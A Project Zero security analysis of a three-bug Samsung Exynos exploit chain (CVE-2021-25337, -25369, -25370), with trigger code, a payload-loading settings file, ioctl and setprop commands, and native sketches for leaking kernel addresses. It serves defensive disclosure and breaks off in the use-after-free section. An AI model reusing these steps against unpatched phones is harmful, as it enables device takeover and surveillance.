
A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Posted by Maddie Stone, Project Zero

Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.

As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendors transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.

While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.

We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.

The sample used three vulnerabilities, all patched in March 2021 by Samsung:

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337
  2. Kernel information leak via sec_log - CVE-2021-25369
  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370

The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example, the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC, while phones sold in most other places (e.g. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.

Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.

The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.

Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider  Severity: Moderate Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0) Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service."

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.

According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.

Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:


        DATABASE_NAME = "clipboardimage.db"

        TABLE_NAME = "ClipboardImageTable"

        URL = "content://com.sec.android.semclipboardprovider/images"

        CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";

Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.

UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>

Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.

    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.

The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.

ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

Uri semclipboard_uri = Uri.parse("content://com.sec.android.semclipboardprovider");

ContentResolver resolver = getContentResolver();

Uri newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 

Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
  4. Get the ContentResolver object that allows apps access to ContentProviders.
  5. Call insert on the semclipboardprovider with our key-value pair.
  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.

The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app processes don’t have access to open or create users_system_data_file files, so in this case the exploit proxies the open through system_server, which can open users_system_data_file. While untrusted_app can’t open or create users_system_data_file files, it can read and write to them. Once the clipboard content provider opens the file and passes the fd to the calling process, the calling process can read and write to it.

The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.
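At the native level, using the proxied file descriptor is then just a plain write loop. A minimal sketch, where stage2_elf and stage2_len are placeholder names for the embedded payload (not names from the sample):

#include <stddef.h>
#include <unistd.h>

/* Sketch: dump the embedded stage 2 ELF through the fd that system_server
 * opened on the exploit's behalf. */
static int drop_stage2(int proxied_fd, const unsigned char *stage2_elf,
                       size_t stage2_len)
{
        size_t off = 0;
        while (off < stage2_len) {
                ssize_t n = write(proxied_fd, stage2_elf + off, stage2_len - off);
                if (n < 0)
                        return -1;
                off += (size_t)n;
        }
        return close(proxied_fd);
}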

This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks whether the UID of the calling process is 1000, meaning that it is already running with system privileges.

  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).

The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.

Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.

The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service, which then loads its stage 2 executable file as the system UID and the system_app SELinux context.

To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name="eng-USA-Variant Info">f00</string>

          <string name="SMT_STUBCHECK_STATUS">STUB_SUCCESS</string>

          <string name="SMT_LATEST_INSTALLED_ENGINE_PATH">/data/system/users/0/newFile.bin</string>

      </map>

The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.

The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. Devices that shipped with Android 10 (Q) appear to have launched with an updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.

Phones that launched on Android P and earlier seem to have still had a pre-3.0.08.18 version of the app, which does load the executable, up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.

Once the ELF file is loaded via the System.load API, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.

The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.

Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0) Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file."

The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.

void __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);

        if (args)

                vprintk(args->fmt, args->args);

        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}

On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 

a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };

Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.

The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  

/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;

        cli = filp->private_data;

        if (!cli)

                return -EINVAL;

        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

       

        [...]

        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }

        return rcode;

}

Specifically, the WARN_ON is in the function kbasep_vinstr_hwcnt_reader_ioctl. To trigger it, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver so that its ioctls can be called, and the second is an ioctl on the hwcnt fd with an invalid ioctl number: 0xFE.

   hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

   ioctl(hwcnt_fd, 0x4004BEFE, 0);

To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:

setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;

In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport.

allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;
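Since the exploit is native code running as system_app at this point, the equivalent of the setprop shell commands shown above can be done directly through bionic's property API. A rough sketch, assuming the same property names and values:

#include <sys/system_properties.h>

/* Sketch: native equivalent of "setprop dumpstate.options bugreportfull"
 * and "setprop ctl.start bugreport". ctl.start asks init to start the
 * named service, which the permissive Samsung policy allows for system_app. */
static int start_bugreport(void)
{
        if (__system_property_set("dumpstate.options", "bugreportfull") != 0)
                return -1;
        return __system_property_set("ctl.start", "bugreport");
}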

The bugreport service is defined in /system/etc/init/dumpstate.rc:

service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot

The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.

The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.

  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");

After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.
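A sketch of that inotify watch, using the directory and file name described above (error handling trimmed):

#include <string.h>
#include <unistd.h>
#include <sys/inotify.h>

/* Sketch: block until a file in /data/log/ that was open for writing is
 * closed, i.e. dumpstate has finished writing sec_log.log. */
static int wait_for_sec_log(void)
{
        char buf[4096];
        int fd = inotify_init();
        if (fd < 0)
                return -1;
        inotify_add_watch(fd, "/data/log", IN_CLOSE_WRITE);
        for (;;) {
                ssize_t len = read(fd, buf, sizeof(buf));
                if (len <= 0)
                        break;
                for (ssize_t i = 0; i < len; ) {
                        struct inotify_event *ev = (struct inotify_event *)&buf[i];
                        if ((ev->mask & IN_CLOSE_WRITE) && ev->len &&
                            strcmp(ev->name, "sec_log.log") == 0) {
                                close(fd);
                                return 0;
                        }
                        i += (ssize_t)(sizeof(*ev) + ev->len);
                }
        }
        close(fd);
        return -1;
}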

An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.

<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164tv

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74
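The two leaked values are the first quadwords printed on the bb60 and bbc0 lines of the exception stack dump above. A rough sketch of how such a dump could be parsed; this is illustrative, not the sample's code:

#include <stdio.h>
#include <string.h>

/* Sketch: pull the first value on the "...b60:" line (the task_struct) and
 * the "...bc0:" line (the sys_call_table address, per the description above)
 * out of sec_log.log. */
static int parse_sec_log(unsigned long *task_struct_addr,
                         unsigned long *sys_call_table_addr)
{
        char line[512];
        FILE *f = fopen("/data/log/sec_log.log", "r");
        if (!f)
                return -1;
        *task_struct_addr = *sys_call_table_addr = 0;
        while (fgets(line, sizeof(line), f)) {
                char *p;
                if ((p = strstr(line, "b60: ")) != NULL)
                        sscanf(p + 5, "%lx", task_struct_addr);
                else if ((p = strstr(line, "bc0: ")) != NULL)
                        sscanf(p + 5, "%lx", sys_call_table_addr);
        }
        fclose(f);
        return (*task_struct_addr && *sys_call_table_addr) ? 0 : -1;
}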

The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.

$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app

allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };

allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.
  • Removed the bugreport service from dumpstate.rc.

In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.
  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.

Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access.

Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19925 (CVE-2021-25370): Memory corruption in dpu driver  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0), R(11.0) devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption."

Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.

The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:

stream lids=0,3,4

The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.

Now it has the PID of android.hardware.graphics.composer, the Hardware Composer HAL.
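A sketch of that logd interaction, using the socket path and stream command described above. Each reply from logdr carries a binary log entry header, which includes the sender's PID, followed by the tag and message; the header parsing is omitted here and only the keyword scan is shown:

#define _GNU_SOURCE
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Sketch: ask logd for the main (0), system (3) and crash (4) buffers and
 * wait for an entry mentioning "SDM" or "display". The real exploit then
 * pulls the PID out of that entry's header. */
static int find_composer_entry(void)
{
        struct sockaddr_un addr = { .sun_family = AF_UNIX };
        char buf[4096];
        const char *cmd = "stream lids=0,3,4";
        int fd = socket(AF_UNIX, SOCK_SEQPACKET, 0);
        if (fd < 0)
                return -1;
        strcpy(addr.sun_path, "/dev/socket/logdr");
        if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
                return -1;
        write(fd, cmd, strlen(cmd) + 1);
        for (;;) {
                ssize_t n = read(fd, buf, sizeof(buf));
                if (n <= 0)
                        return -1;
                if (memmem(buf, (size_t)n, "SDM", 3) ||
                    memmem(buf, (size_t)n, "display", 7))
                        return fd;      /* entry of interest is in buf */
        }
}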

Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path.
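A sketch of that /proc/<PID>/fd walk (error handling trimmed):

#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Sketch: resolve each /proc/<pid>/fd/<fd> symlink in the composer process
 * and return the first target path that refers to the DECON device. */
static int find_decon_path(int pid, char *out, size_t out_len)
{
        char dir_path[64], link_path[128], target[256];
        struct dirent *de;
        DIR *dir;

        snprintf(dir_path, sizeof(dir_path), "/proc/%d/fd", pid);
        dir = opendir(dir_path);
        if (!dir)
                return -1;
        while ((de = readdir(dir)) != NULL) {
                ssize_t n;
                snprintf(link_path, sizeof(link_path), "%s/%s", dir_path, de->d_name);
                n = readlink(link_path, target, sizeof(target) - 1);
                if (n < 0)
                        continue;
                target[n] = '\0';
                if (strstr(target, "graphics/fb0")) {
                        snprintf(out, out_len, "%s", target);
                        closedir(dir);
                        return 0;
                }
        }
        closedir(dir);
        return -1;
}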

Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes.

/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif

        wait_queue_head_t       wq;

        unsigned long           flags;

        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};

